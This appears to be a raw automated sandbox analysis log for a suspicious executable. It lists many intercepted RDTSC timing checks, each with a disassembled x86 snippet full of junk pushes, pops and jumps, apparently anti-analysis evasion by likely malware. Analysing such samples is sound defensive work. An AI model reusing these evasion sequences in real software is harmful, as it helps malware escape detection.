Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59AC7 second address: A59B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FFA68B945C9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FFA68B945BEh 0x00000013 mov ebx, dword ptr [ebp+122D3B69h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FFA68B945B8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D27CAh], edi 0x0000003b push 00000000h 0x0000003d mov ebx, 15BD1B32h 0x00000042 xchg eax, esi 0x00000043 jbe 00007FFA68B945C0h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59B37 second address: A59B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFA692CA41Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59B50 second address: A59B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59B56 second address: A59B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5AAB2 second address: A5AAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5AAB7 second address: A5AAC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6A05C second address: A6A098 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FFA68B945C1h 0x0000000f ja 00007FFA68B945C6h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6A098 second address: A6A09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6A09E second address: A6A0B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007FFA68B945B6h 0x00000013 jp 00007FFA68B945B6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6A0B8 second address: A6A0D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA425h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0A8 second address: A6F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0AD second address: A6F0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FFA692CA416h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0B9 second address: A6F0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0BD second address: A6F0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0C3 second address: A6F0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0CF second address: A6F0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E3E7 second address: A6E404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA68B945C7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E404 second address: A6E40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E40A second address: A6E43D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFA68B945C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA68B945C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E43D second address: A6E441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E441 second address: A6E457 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFA68B945B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007FFA68B945BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E457 second address: A6E463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFA692CA422h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E88F second address: A6E895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E895 second address: A6E899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E899 second address: A6E8B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E8B1 second address: A6E8B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E8B8 second address: A6E8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E8C6 second address: A6E8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6ECA4 second address: A6ECAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6ECAA second address: A6ECBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007FFA692CA41Eh 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7632B second address: A76336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFA68B945B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76336 second address: A76361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA425h 0x00000009 jmp 00007FFA692CA422h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76361 second address: A76365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76365 second address: A7637F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFA692CA41Ah 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7637F second address: A7638B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA68B945B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7678D second address: A76791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76791 second address: A767B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFA68B945C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A767B0 second address: A767B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A767B4 second address: A767B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A767B8 second address: A767C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A767C2 second address: A767D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FFA68B945B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76961 second address: A76971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76971 second address: A76975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76975 second address: A76994 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA428h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76994 second address: A7699A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76B2A second address: A76B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56DE1 second address: A56DE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0A4F0 second address: A0A50A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA425h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0A50A second address: A0A512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0A512 second address: A0A518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A48CCB second address: A48CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A48CCF second address: A48CE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A48CE2 second address: A48CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A48CE7 second address: A29ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA424h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f lea eax, dword ptr [ebp+12490A40h] 0x00000015 mov ecx, dword ptr [ebp+12455844h] 0x0000001b push eax 0x0000001c jno 00007FFA692CA41Eh 0x00000022 mov dword ptr [esp], eax 0x00000025 sub dword ptr [ebp+12455C40h], edi 0x0000002b call dword ptr [ebp+122D25B0h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FFA692CA429h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A493C0 second address: A493C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A493C4 second address: A493CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59CEA second address: A59CF6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59CF6 second address: A59CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59DAC second address: A59DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59DB1 second address: A59DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA424h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FFA692CA425h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5AC7D second address: A5AC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5AC81 second address: A5AC87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A497CC second address: A49824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FFA68B945B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FFA68B945B8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FFA68B945B8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 sbb edi, 6BBAD400h 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A49824 second address: A49828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A49828 second address: A49836 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A49BFC second address: A49C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A49F98 second address: A4A017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFA68B945B6h 0x0000000a popad 0x0000000b jmp 00007FFA68B945BAh 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FFA68B945B8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e lea eax, dword ptr [ebp+12490A84h] 0x00000034 sub dword ptr [ebp+122D1F0Bh], ecx 0x0000003a nop 0x0000003b pushad 0x0000003c jmp 00007FFA68B945C3h 0x00000041 jmp 00007FFA68B945C9h 0x00000046 popad 0x00000047 push eax 0x00000048 pushad 0x00000049 pushad 0x0000004a jnc 00007FFA68B945B6h 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7D8F7 second address: A7D8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7D8FD second address: A7D907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFA68B945B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7D907 second address: A7D90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7DA4B second address: A7DA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7DCD6 second address: A7DCF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FFA692CA416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007FFA692CA416h 0x00000015 jo 00007FFA692CA416h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7DCF2 second address: A7DCFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7DCFA second address: A7DCFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7DCFE second address: A7DD1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FFA68B945BCh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FFA68B945C4h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7E121 second address: A7E13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FFA692CA429h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7E13F second address: A7E14E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jns 00007FFA68B945B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7E14E second address: A7E154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A83A5B second address: A83A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA68B945C3h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FFA68B945C0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A83BDD second address: A83C26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FFA692CA416h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e js 00007FFA692CA42Dh 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FFA692CA425h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FFA692CA427h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A83C26 second address: A83C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007FFA68B945C7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A840A5 second address: A840BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA423h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A84242 second address: A8425E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A8425E second address: A8427E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA421h 0x00000007 jnp 00007FFA692CA416h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A846EA second address: A846F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFA68B945B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A846F6 second address: A846FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A846FA second address: A84700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 9F9BEE second address: 9F9BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 9F9BF2 second address: 9F9BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
